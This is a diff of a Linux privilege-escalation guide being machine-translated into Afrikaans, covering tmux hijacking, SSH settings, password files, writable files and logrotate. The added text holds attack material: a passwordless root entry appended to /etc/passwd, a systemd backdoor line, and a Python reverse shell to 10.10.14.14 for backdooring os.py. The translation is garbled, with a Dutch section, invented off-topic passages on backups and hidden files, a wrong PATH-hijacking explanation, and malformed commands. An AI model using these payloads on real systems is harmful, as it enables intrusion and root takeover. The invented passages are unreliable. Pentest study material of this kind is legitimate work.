-S /tmp/dev_sess ls #List using that socket, you can start a tmux session in that socket with: tmux -S /tmp/dev_sess ``` +**Koppel aan 'n sessie** -![](<../../.gitbook/assets/image (131).png>) +Om toegang te verkry tot 'n aktiewe sessie op 'n Linux-stelsel, kan jy die volgende stappe volg: -**Attach to a session** +1. Identifiseer die sessie wat jy wil koppel aan deur die `who` of `w` opdrag uit te voer. Hierdie opdrag sal 'n lys van aktiewe sessies toon, insluitend die gebruikersnaam en die tty (teletipe) waarop die sessie uitgevoer word. +2. Gebruik die `screen` of `tmux` hulpmiddel om aan die sessie te koppel. Hierdie hulpmiddels bied die vermoë om aan te sluit by 'n bestaande sessie sonder om die huidige sessie te onderbreek. + +3. Voer die relevante opdrag in om die sessie te manipuleer of te monitor. + +Hier is 'n voorbeeld van hoe om aan 'n sessie te koppel met behulp van die `screen` hulpmiddel: + +```bash +screen -r +``` + +Hier is 'n voorbeeld van hoe om aan 'n sessie te koppel met behulp van die `tmux` hulpmiddel: + +```bash +tmux attach -t +``` + +Onthou om die korrekte sessie-ID te gebruik wanneer jy aan 'n sessie koppel. ```bash tmux attach -t myname #If you write something in this session it will appears in the other opened one tmux attach -d -t myname #First detach the session from the other console and then access it yourself @@ -1318,149 +1313,151 @@ rw-rw---- 1 root devs 0 Sep 1 06:27 /tmp/dev_sess #In this case root and devs c # If you are root or devs you can access it tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket ``` - -Check **Valentine box from HTB** for an example. +Kyk na **Valentine-boks van HTB** vir 'n voorbeeld. ## SSH -### Debian OpenSSL Predictable PRNG - CVE-2008-0166 +### Debian OpenSSL Voorspelbare PRNG - CVE-2008-0166 -All SSL and SSH keys generated on Debian based systems (Ubuntu, Kubuntu, etc) between September 2006 and May 13th, 2008 may be affected by this bug.\ -This bug is caused when creating a new ssh key in those OS, as **only 32,768 variations were possible**. This means that all the possibilities can be calculated and **having the ssh public key you can search for the corresponding private key**. You can find the calculated possibilities here: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) +Alle SSL- en SSH-sleutels wat gegenereer is op Debian-gebaseerde stelsels (Ubuntu, Kubuntu, ens.) tussen September 2006 en 13 Mei 2008 kan deur hierdie fout geraak word.\ +Hierdie fout word veroorsaak wanneer 'n nuwe ssh-sleutel geskep word in hierdie bedryfstelsels, aangesien **slegs 32,768 variasies moontlik was**. Dit beteken dat al die moontlikhede bereken kan word en **deur die ssh-publieke sleutel te hê, kan jy soek na die ooreenstemmende privaat sleutel**. Jy kan die berekende moontlikhede hier vind: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) -### SSH Interesting configuration values +### SSH Interessante konfigurasiewaardes -* **PasswordAuthentication:** Specifies whether password authentication is allowed. The default is `no`. -* **PubkeyAuthentication:** Specifies whether public key authentication is allowed. The default is `yes`. -* **PermitEmptyPasswords**: When password authentication is allowed, it specifies whether the server allows login to accounts with empty password strings. The default is `no`. +* **PasswordAuthentication:** Spesifiseer of wagwoord-verifikasie toegelaat word. Die verstek is `no`. +* **PubkeyAuthentication:** Spesifiseer of publieke sleutel-verifikasie toegelaat word. Die verstek is `yes`. +* **PermitEmptyPasswords**: Wanneer wagwoord-verifikasie toegelaat word, spesifiseer dit of die bediener toelaat dat daar aanteken word by rekeninge met leë wagwoordstrings. Die verstek is `no`. ### PermitRootLogin -Specifies whether root can log in using ssh, default is `no`. Possible values: +Spesifiseer of root kan inlog met ssh, verstek is `no`. Moontlike waardes: -* `yes`: root can login using password and private key -* `without-password` or `prohibit-password`: root can only login with a private key -* `forced-commands-only`: Root can login only using private key and if the commands options are specified -* `no` : no +* `yes`: root kan inlog met wagwoord en privaat sleutel +* `without-password` of `prohibit-password`: root kan slegs inlog met 'n privaat sleutel +* `forced-commands-only`: Root kan slegs inlog met 'n privaat sleutel en as die opsiesspesifiseer is +* `no` : nee ### AuthorizedKeysFile -Specifies files that contain the public keys that can be used for user authentication. It can contain tokens like `%h`, which will be replaced by the home directory. **You can indicate absolute paths** (starting in `/`) or **relative paths from the user's home**. For example: - +Spesifiseer lêers wat die publieke sleutels bevat wat gebruik kan word vir gebruikersverifikasie. Dit kan tokens soos `%h` bevat, wat vervang sal word deur die tuisgids. **Jy kan absolute paaie aandui** (beginnend met `/`) of **relatiewe paaie vanaf die gebruiker se tuisgids**. Byvoorbeeld: ```bash AuthorizedKeysFile .ssh/authorized_keys access ``` - -That configuration will indicate that if you try to login with the **private** key of the user "**testusername**" ssh is going to compare the public key of your key with the ones located in `/home/testusername/.ssh/authorized_keys` and `/home/testusername/access` +Daardie konfigurasie sal aandui dat as jy probeer om in te teken met die **privaat** sleutel van die gebruiker "**testusername**", ssh die publieke sleutel van jou sleutel gaan vergelyk met die een wat in `/home/testusername/.ssh/authorized_keys` en `/home/testusername/access` geleë is. ### ForwardAgent/AllowAgentForwarding -SSH agent forwarding allows you to **use your local SSH keys instead of leaving keys** (without passphrases!) sitting on your server. So, you will be able to **jump** via ssh **to a host** and from there **jump to another** host **using** the **key** located in your **initial host**. - -You need to set this option in `$HOME/.ssh.config` like this: +SSH-agent deurstuur maak dit moontlik om jou plaaslike SSH-sleutels te gebruik in plaas daarvan om sleutels (sonder wagwoorde!) op jou bediener te laat staan. So, sal jy in staat wees om via ssh **na 'n gasheer te spring** en van daar af **na 'n ander** gasheer te spring **deur gebruik te maak van** die **sleutel** wat in jou **oorspronklike gasheer** geleë is. +Jy moet hierdie opsie in `$HOME/.ssh.config` so instel: ``` Host example.com - ForwardAgent yes +ForwardAgent yes ``` +Let daarop dat as `Host` `*` is, sal daardie host elke keer as die gebruiker na 'n ander masjien spring, toegang tot die sleutels hê (wat 'n veiligheidsprobleem is). -Notice that if `Host` is `*` every time the user jumps to a different machine, that host will be able to access the keys (which is a security issue). +Die lêer `/etc/ssh_config` kan hierdie opsies **oorheers** en hierdie konfigurasie toelaat of weier.\ +Die lêer `/etc/sshd_config` kan ssh-agent deurstuur toelaat of weier met die sleutelwoord `AllowAgentForwarding` (verstek is toelaat). -The file `/etc/ssh_config` can **override** this **options** and allow or denied this configuration.\ -The file `/etc/sshd_config` can **allow** or **denied** ssh-agent forwarding with the keyword `AllowAgentForwarding` (default is allow). - -If you find that Forward Agent is configured in an environment read the following page as **you may be able to abuse it to escalate privileges**: +As jy vind dat Forward Agent in 'n omgewing gekonfigureer is, lees dan die volgende bladsy **om moontlik voorregte te verhoog**: {% content-ref url="ssh-forward-agent-exploitation.md" %} [ssh-forward-agent-exploitation.md](ssh-forward-agent-exploitation.md) {% endcontent-ref %} -## Interesting Files +## Interessante Lêers -### Profiles files - -The file `/etc/profile` and the files under `/etc/profile.d/` are **scripts that are executed when a user runs a new shell**. Therefore, if you can **write or modify any of them you can escalate privileges**. +### Profiel-lêers +Die lêer `/etc/profile` en die lêers onder `/etc/profile.d/` is **skripte wat uitgevoer word wanneer 'n gebruiker 'n nuwe skil gebruik**. Daarom, as jy enige van hulle kan **skryf of wysig, kan jy voorregte verhoog**. ```bash ls -l /etc/profile /etc/profile.d/ ``` +As enige vreemde profiel skrips gevind word, moet jy dit nagaan vir **sensitiewe besonderhede**. -If any weird profile script is found you should check it for **sensitive details**. - -### Passwd/Shadow Files - -Depending on the OS the `/etc/passwd` and `/etc/shadow` files may be using a different name or there may be a backup. Therefore it's recommended **find all of them** and **check if you can read** them to see **if there are hashes** inside the files: +### Passwd/Shadow-lêers +Afhanklik van die bedryfstelsel kan die `/etc/passwd` en `/etc/shadow` lêers 'n ander naam gebruik of daar kan 'n rugsteun wees. Daarom word dit aanbeveel om **al hulle te vind** en te **nagaan of jy dit kan lees** om te sien **of daar hasings** binne die lêers is: ```bash #Passwd equivalent files cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null #Shadow equivalent files cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null ``` - -In some occasions you can find **password hashes** inside the `/etc/passwd` (or equivalent) file - +In sommige gevalle kan jy **wagwoordhasings** binne die `/etc/passwd` (of ekwivalente) lêer vind. ```bash grep -v '^[^:]*:[x\*]' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null ``` +### Skryfbare /etc/passwd -### Writable /etc/passwd - -First, generate a password with one of the following commands. - +Eerstens, genereer 'n wagwoord met een van die volgende opdragte. ``` openssl passwd -1 -salt hacker hacker mkpasswd -m SHA-512 hacker python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")' ``` - -Then add the user `hacker` and add the generated password. - +Voeg dan die gebruiker `hacker` by en voeg die gegenereerde wagwoord by. ``` hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash ``` +Byvoorbeeld: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` -E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` - -You can now use the `su` command with `hacker:hacker` - -Alternatively, you can use the following lines to add a dummy user without a password.\ -WARNING: you might degrade the current security of the machine. +Jy kan nou die `su` bevel gebruik met `hacker:hacker` +As alternatief kan jy die volgende lyne gebruik om 'n dummie-gebruiker sonder 'n wagwoord by te voeg.\ +WAARSKUWING: jy kan die huidige veiligheid van die masjien verminder. ``` echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd su - dummy ``` +NOTA: In BSD-platforms is `/etc/passwd` geleë by `/etc/pwd.db` en `/etc/master.passwd`, ook is die `/etc/shadow` hernoem na `/etc/spwd.db`. -NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. - -You should check if you can **write in some sensitive files**. For example, can you write to some **service configuration file**? - +Jy moet nagaan of jy kan **skryf na sekere sensitiewe lêers**. Byvoorbeeld, kan jy skryf na 'n **dienskonfigurasie-lêer**? ```bash find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done #Find files writable by any group of the user ``` - -For example, if the machine is running a **tomcat** server and you can **modify the Tomcat service configuration file inside /etc/systemd/,** then you can modify the lines: - +Byvoorbeeld, as die masjien 'n **tomcat**-bediener hardloop en jy die **Tomcat-dienskonfigurasie-lêer binne /etc/systemd/ kan wysig**, kan jy die lyne wysig: ``` ExecStart=/path/to/backdoor User=root Group=root ``` +Jou agterdeur sal uitgevoer word die volgende keer as tomcat begin word. -Your backdoor will be executed the next time that tomcat is started. - -### Check Folders - -The following folders may contain backups or interesting information: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Probably you won't be able to read the last one but try) +### Kontroleer Lêers +Die volgende lêers mag rugsteuners of interessante inligting bevat: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Waarskynlik sal jy nie in staat wees om die laaste een te lees nie, maar probeer) ```bash ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root ``` +### Vreemde Ligging/Eienaar-lêers -### Weird Location/Owned files +In sommige gevallen kan het nuttig zijn om te zoeken naar bestanden die zich op ongebruikelijke locaties bevinden of die eigendom zijn van andere gebruikers. Dit kan wijzen op mogelijke beveiligingsproblemen of privilege-escalatiekansen. +Hier zijn enkele locaties en bestanden die u kunt controleren: + +#### /tmp + +De map /tmp wordt vaak gebruikt om tijdelijke bestanden op te slaan. Het is mogelijk dat kwaadwillende gebruikers hier bestanden plaatsen om later toegang te krijgen tot het systeem. Controleer de inhoud van /tmp en verwijder verdachte bestanden. + +#### /var/tmp + +Net als /tmp wordt /var/tmp gebruikt voor tijdelijke bestanden. Controleer ook hier de inhoud en verwijder verdachte bestanden. + +#### /dev/shm + +/dev/shm is een virtueel bestandssysteem dat wordt gebruikt voor het delen van geheugen tussen processen. Het kan ook worden misbruikt om kwaadaardige bestanden te plaatsen. Controleer de inhoud van /dev/shm en verwijder verdachte bestanden. + +#### /var/www/html + +De map /var/www/html wordt vaak gebruikt voor het hosten van webinhoud. Als u geen webserver op uw systeem hebt geïnstalleerd, kan het wijzen op een ongeautoriseerde toegang. Controleer de inhoud van /var/www/html en verwijder eventuele verdachte bestanden. + +#### Bestanden die eigendom zijn van andere gebruikers + +Controleer de bestanden op uw systeem en let op bestanden die eigendom zijn van andere gebruikers dan de standaardgebruiker. Dit kan erop wijzen dat een gebruiker ongeautoriseerde toegang heeft gekregen tot uw systeem. Onderzoek deze bestanden en neem passende maatregelen. + +Het controleren van deze locaties en bestanden kan u helpen bij het identificeren van mogelijke beveiligingsproblemen en het voorkomen van privilege-escalatie. ```bash #root owned files in /home folders find /home -user root 2>/dev/null @@ -1472,77 +1469,176 @@ find / -type f -user root ! -perm -o=r 2>/dev/null find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null #Writable files by each group I belong to for g in `groups`; - do printf " Group $g:\n"; - find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null - done +do printf " Group $g:\n"; +find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null +done done ``` +### Gewysigde lêers in die laaste minute -### Modified files in last mins +Hier is 'n paar maniere om gewysigde lêers in die laaste paar minute op te spoor: +#### Met behulp van die `find`-opdrag + +Gebruik die volgende opdrag om gewysigde lêers in die huidige gids in die laaste 5 minute op te spoor: + +```bash +find . -type f -mmin -5 +``` + +Hier is 'n kort verduideliking van die gebruikte vlagte: + +- `.`: Dui aan dat die soektog in die huidige gids plaasvind. +- `-type f`: Slegs soek na gewone lêers (nie gidslêers of spesiale lêers nie). +- `-mmin -5`: Soek na lêers wat in die laaste 5 minute gewysig is. + +#### Met behulp van die `ls`-opdrag + +Gebruik die volgende opdrag om 'n lys van gewysigde lêers in die huidige gids in die laaste 10 minute te kry: + +```bash +ls -lt --time=minutes --time-style=+"%Y-%m-%d %H:%M" | grep "$(date -d '10 minutes ago' +'%Y-%m-%d %H:%M')" +``` + +Hier is 'n kort verduideliking van die gebruikte vlagte: + +- `-lt`: Sorteer die lêers volgens gewysigde tyd, met die nuutste bo-aan. +- `--time=minutes`: Toon die gewysigde tyd in minute. +- `--time-style=+"%Y-%m-%d %H:%M"`: Spesifiseer die formaat van die gewysigde tyd. +- `grep "$(date -d '10 minutes ago' +'%Y-%m-%d %H:%M')"`: Filter die lys om slegs die lêers te toon wat in die laaste 10 minute gewysig is. + +#### Met behulp van die `find`-opdrag en `stat`-opdrag + +Gebruik die volgende opdrag om gewysigde lêers in die huidige gids in die laaste 15 minute op te spoor: + +```bash +find . -type f -exec stat -c "%y %n" {} \; | awk -v lim="$(date -d '15 minutes ago' +'%Y-%m-%d %H:%M:%S')" '$0 > lim' +``` + +Hier is 'n kort verduideliking van die gebruikte vlagte: + +- `-exec stat -c "%y %n" {} \;`: Voer die `stat`-opdrag uit vir elke gevonde lêer en toon die gewysigde tyd en lêernaam. +- `awk -v lim="$(date -d '15 minutes ago' +'%Y-%m-%d %H:%M:%S')" '$0 > lim'`: Filter die uitset van die `stat`-opdrag om slegs die lêers te toon wat in die laaste 15 minute gewysig is. ```bash find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null ``` +### Sqlite DB-lêers -### Sqlite DB files +SQLite is 'n selfbevatte, bedienerlose, open source SQL-databasisenjin wat gebruik word om databasislêers te skep en te bestuur. Hierdie databasislêers is gewoonlik plat lêers wat gebruik kan word deur toepassings om data te stoor en te onttrek. SQLite-databasislêers het die .db-lêeruitbreiding. +#### Identifiseer SQLite-databasislêers + +Om SQLite-databasislêers op 'n Linux-stelsel te identifiseer, kan jy die volgende opdrag gebruik: + +```bash +find / -name "*.db" 2>/dev/null +``` + +Hierdie opdrag sal soek na alle lêers met die .db-uitbreiding in die hele lêerstelsel en die resultate vertoon. + +#### Toegang tot SQLite-databasislêers + +As jy toegang tot 'n SQLite-databasislêer wil verkry, kan jy dit oopmaak met 'n SQLite-kliënt. Jy kan die volgende opdrag gebruik om 'n SQLite-kliënt te open: + +```bash +sqlite3 +``` + +Vervang `` met die pad na die SQLite-databasislêer wat jy wil oopmaak. + +#### Uitvoer van SQL-opdragte + +Nadat jy 'n SQLite-databasislêer oopgemaak het met die SQLite-kliënt, kan jy SQL-opdragte uitvoer om data te onttrek of te wysig. Hier is 'n paar nuttige opdragte: + +- `SELECT * FROM ;` - Gee alle rekords terug in 'n spesifieke tabel. +- `INSERT INTO VALUES ();` - Voeg 'n nuwe rekord by in 'n spesifieke tabel. +- `UPDATE SET = WHERE ;` - Werk 'n spesifieke rekord in 'n tabel opdateer. +- `DELETE FROM WHERE ;` - Verwyder 'n spesifieke rekord uit 'n tabel. + +Vervang ``, ``, `` en `` met die toepaslike waardes vir jou spesifieke situasie. + +#### Let op + +By die gebruik van SQLite-databasislêers, moet jy bewus wees van die risiko van datakorrupsie of verlies. Maak altyd 'n afskrif van die oorspronklike databasislêer voordat jy enige wysigings aanbring. ```bash find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null ``` - -### \*\_history, .sudo\_as\_admin\_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml files - +### \*\_geskiedenis, .sudo\_as\_admin\_suksesvol, profiel, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml lêers ```bash find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null ``` +### Versteekte lêers -### Hidden files +In Linux, versteekte lêers is lêers wat begin met 'n punt (.) in die naam. Hierdie lêers is nie sigbaar wanneer jy die `ls`-opdrag gebruik nie, tensy jy die `-a`-vlag gebruik. Dit is 'n goeie praktyk om belangrike lêers te versteek om te voorkom dat hulle per ongeluk verwyder of gewysig word. +Om versteekte lêers te sien, gebruik die volgende opdrag: + +```bash +ls -a +``` + +Dit sal alle lêers, insluitend die versteekte lêers, in die huidige gids vertoon. + +As jy 'n spesifieke versteekte lêer wil sien, gebruik die volgende opdrag: + +```bash +ls -a .versteekte_lêer +``` + +Hierdie opdrag sal die inhoud van die spesifieke versteekte lêer vertoon. + +Dit is belangrik om te onthou dat versteekte lêers nie noodwendig veilig is nie. Hulle kan steeds toegangbaar wees vir 'n aanvaller wat toegang tot die stelsel verkry het. ```bash find / -type f -iname ".*" -ls 2>/dev/null ``` +### **Skrip/Binêre lêers in PAD** -### **Script/Binaries in PATH** +As jy 'n gebruiker met beperkte regte is op 'n Linux-stelsel, kan jy dalk toegang verkry tot hoër regte deur gebruik te maak van skrip- of binêre lêers wat in die PAD (Path) van die stelsel geplaas is. Die PAD is 'n lys van directories waarin die stelsel soek vir uitvoerbare lêers wanneer 'n opdrag uitgevoer word. +Om hierdie tegniek te gebruik, moet jy 'n skrip of binêre lêer skep met dieselfde naam as 'n bestaande opdrag wat hoër regte vereis. Wanneer die gebruiker met beperkte regte die opdrag uitvoer, sal die stelsel die skrip of binêre lêer in die PAD vind en uitvoer, wat jou toegang tot die hoër regte gee. + +Dit is belangrik om te onthou dat hierdie tegniek slegs werk as die gebruiker met beperkte regte die regte het om die oorspronklike opdrag uit te voer. ```bash for d in `echo $PATH | tr ":" "\n"`; do find $d -name "*.sh" 2>/dev/null; done for d in `echo $PATH | tr ":" "\n"`; do find $d -type -f -executable 2>/dev/null; done ``` - -### **Web files** - +### **Weblêers** ```bash ls -alhR /var/www/ 2>/dev/null ls -alhR /srv/www/htdocs/ 2>/dev/null ls -alhR /usr/local/www/apache22/data/ ls -alhR /opt/lampp/htdocs/ 2>/dev/null ``` +### **Rugsteun** -### **Backups** +Backups is 'n belangrike aspek van enige goeie beveiligingsstrategie. Dit behels die maak van kopieë van belangrike data en lêers om te verseker dat dit beskikbaar is in die geval van 'n ongeluk, data verlies, of 'n aanval. Hier is 'n paar belangrike punte om in gedagte te hou wanneer dit kom by backups: +- **Gereelde backups**: Maak gereelde kopieë van jou data om te verseker dat jy die mees onlangse weergawe daarvan het. Dit kan help om verlies van data te voorkom in die geval van 'n aanval of ongeluk. +- **Veilige opberging**: Berg jou backups op 'n veilige plek op, soos 'n eksterne hardeskyf of 'n beveiligde skyf in die wolk. Dit sal help om te verseker dat jou backups nie blootgestel word aan potensiële aanvalle of data verlies nie. +- **Toets jou backups**: Dit is belangrik om gereeld jou backups te toets om seker te maak dat die data suksesvol herstel kan word. Dit sal jou help om te verseker dat jou backups werk en dat jy in staat sal wees om jou data te herstel in die geval van 'n noodgeval. +- **Versleuteling**: As jou backups sensitiewe inligting bevat, oorweeg om dit te versleutel om te verseker dat dit nie in die verkeerde hande val nie. Dit sal help om die vertroulikheid van jou data te beskerm. +- **Offsite backups**: Maak kopieë van jou data op 'n offsite plek, soos 'n ander fisiese ligging of 'n beveiligde wolkoplossing. Dit sal help om te verseker dat jou backups nie verlore gaan in die geval van 'n ramp by jou primêre ligging nie. + +Deur hierdie beste praktyke te volg, kan jy verseker dat jou data veilig en beskikbaar bly, selfs in die geval van 'n aanval of ongeluk. ```bash find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/null ``` +### Bekende lêers wat wagwoorde bevat -### Known files containing passwords +Lees die kode van [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), dit soek na **verskeie moontlike lêers wat wagwoorde kan bevat**.\ +**Nog 'n interessante instrument** wat jy kan gebruik om dit te doen is: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) wat 'n oopbron-toepassing is wat gebruik word om baie wagwoorde wat op 'n plaaslike rekenaar vir Windows, Linux & Mac gestoor word, te herwin. -Read the code of [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), it searches for **several possible files that could contain passwords**.\ -**Another interesting tool** that you can use to do so is: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) which is an open source application used to retrieve lots of passwords stored on a local computer for Windows, Linux & Mac. - -### Logs - -If you can read logs, you may be able to find **interesting/confidential information inside them**. The more strange the log is, the more interesting it will be (probably).\ -Also, some "**bad**" configured (backdoored?) **audit logs** may allow you to **record passwords** inside audit logs as explained in this post: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/). +### Logboeke +As jy logboeke kan lees, kan jy dalk **interessante/vertroulike inligting daarin vind**. Hoe vreemder die logboek is, hoe interessanter dit sal wees (waarskynlik).\ +Ook kan sommige "**sleg**" gekonfigureerde (agterdeur?) **ouditlogboeke** jou in staat stel om wagwoorde in ouditlogboeke op te neem, soos verduidelik in hierdie pos: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/). ```bash aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g" grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null ``` +Om **logboeke van die groep te lees** sal die [**adm**](interesting-groups-linux-pe/#adm-group) groep baie nuttig wees. -In order to **read logs the group** [**adm**](interesting-groups-linux-pe/#adm-group) will be really helpful. - -### Shell files - +### Skuldlêers ```bash ~/.bash_profile # if it exists, read it once when you log in to the shell ~/.bash_login # if it exists, read it once if .bash_profile doesn't exist @@ -1553,75 +1649,70 @@ In order to **read logs the group** [**adm**](interesting-groups-linux-pe/#adm-g ~/.zlogin #zsh shell ~/.zshrc #zsh shell ``` +### Algemene Creds Soek/Regex -### Generic Creds Search/Regex +Jy moet ook kyk vir lêers wat die woord "**password**" in die **naam** of binne die **inhoud** bevat, en kyk ook vir IP-adresse en e-posse binne loglêers, of hashe regexps.\ +Ek gaan nie hier lys hoe om dit alles te doen nie, maar as jy belangstel, kan jy die laaste kontroles wat [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) uitvoer, nagaan. -You should also check for files containing the word "**password**" in its **name** or inside the **content**, and also check for IPs and emails inside logs, or hashes regexps.\ -I'm not going to list here how to do all of this but if you are interested you can check the last checks that [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) perform. +## Skryfbare lêers -## Writable files +### Python-biblioteek kaping -### Python library hijacking - -If you know from **where** a python script is going to be executed and you **can write inside** that folder or you can **modify python libraries**, you can modify the OS library and backdoor it (if you can write where python script is going to be executed, copy and paste the os.py library). - -To **backdoor the library** just add at the end of the os.py library the following line (change IP and PORT): +As jy weet **waarvandaan** 'n Python-skripsie uitgevoer gaan word en jy **kan binne** daardie vouer skryf of jy kan **Python-biblioteke wysig**, kan jy die OS-biblioteek wysig en dit agterdeur maak (as jy kan skryf waar die Python-skripsie uitgevoer gaan word, kopieer en plak die os.py-biblioteek). +Om die biblioteek **agterdeur te maak**, voeg net die volgende lyn by die einde van die os.py-biblioteek (verander IP en PORT): ```python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); ``` +### Logrotate uitbuiting -### Logrotate exploitation - -A vulnerability in `logrotate` lets users with **write permissions** on a log file or its parent directories potentially gain escalated privileges. This is because `logrotate`, often running as **root**, can be manipulated to execute arbitrary files, especially in directories like _**/etc/bash_completion.d/**_. It's important to check permissions not just in _/var/log_ but also in any directory where log rotation is applied. +'n Swakheid in `logrotate` stel gebruikers met **skryfregte** op 'n loglêer of sy ouer gids in staat om moontlik verhoogde bevoegdhede te verkry. Dit is omdat `logrotate`, wat dikwels as **root** loop, gemanipuleer kan word om willekeurige lêers uit te voer, veral in gids soos _**/etc/bash_completion.d/**_. Dit is belangrik om nie net in _/var/log_ nie, maar ook in enige gids waar logrotasie toegepas word, na regte te kyk. {% hint style="info" %} -This vulnerability affects `logrotate` version `3.18.0` and older +Hierdie swakheid affekteer `logrotate` weergawe `3.18.0` en ouer {% endhint %} -More detailed information about the vulnerability can be found on this page: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition). +Gedetailleerde inligting oor die swakheid kan op hierdie bladsy gevind word: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition). -You can exploit this vulnerability with [**logrotten**](https://github.com/whotwagner/logrotten). +Jy kan hierdie swakheid uitbuit met [**logrotten**](https://github.com/whotwagner/logrotten). -This vulnerability is very similar to [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** so whenever you find that you can alter logs, check who is managing those logs and check if you can escalate privileges substituting the logs by symlinks. +Hierdie swakheid is baie soortgelyk aan [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx-loglêers),** so wanneer jy vind dat jy loglêers kan wysig, kyk wie bestuur daardie loglêers en kyk of jy bevoegdhede kan verhoog deur die loglêers met simboleerders te vervang. ### /etc/sysconfig/network-scripts/ (Centos/Redhat) -**Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f) +**Swakheid verwysing:** [**https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f) -If, for whatever reason, a user is able to **write** an `ifcf-` script to _/etc/sysconfig/network-scripts_ **or** it can **adjust** an existing one, then your **system is pwned**. +As, om watter rede ookal, 'n gebruiker in staat is om 'n `ifcf-` skripsie na _/etc/sysconfig/network-scripts_ **te skryf** of 'n bestaande een **aan te pas**, dan is jou **sisteem pwned**. -Network scripts, _ifcg-eth0_ for example are used for network connections. They look exactly like .INI files. However, they are \~sourced\~ on Linux by Network Manager (dispatcher.d). +Netwerkskripsies, byvoorbeeld _ifcg-eth0_, word gebruik vir netwerkverbindings. Hulle lyk presies soos .INI-lêers. Tog word hulle op Linux \~gebron\~ deur Network Manager (dispatcher.d). -In my case, the `NAME=` attributed in these network scripts is not handled correctly. If you have **white/blank space in the name the system tries to execute the part after the white/blank space**. This means that **everything after the first blank space is executed as root**. - -For example: _/etc/sysconfig/network-scripts/ifcfg-1337_ +In my geval word die `NAME=` aanduiding in hierdie netwerkskripsies nie korrek hanteer nie. As jy **wit/leë spasie in die naam het, probeer die stelsel om die gedeelte na die wit/leë spasie uit te voer**. 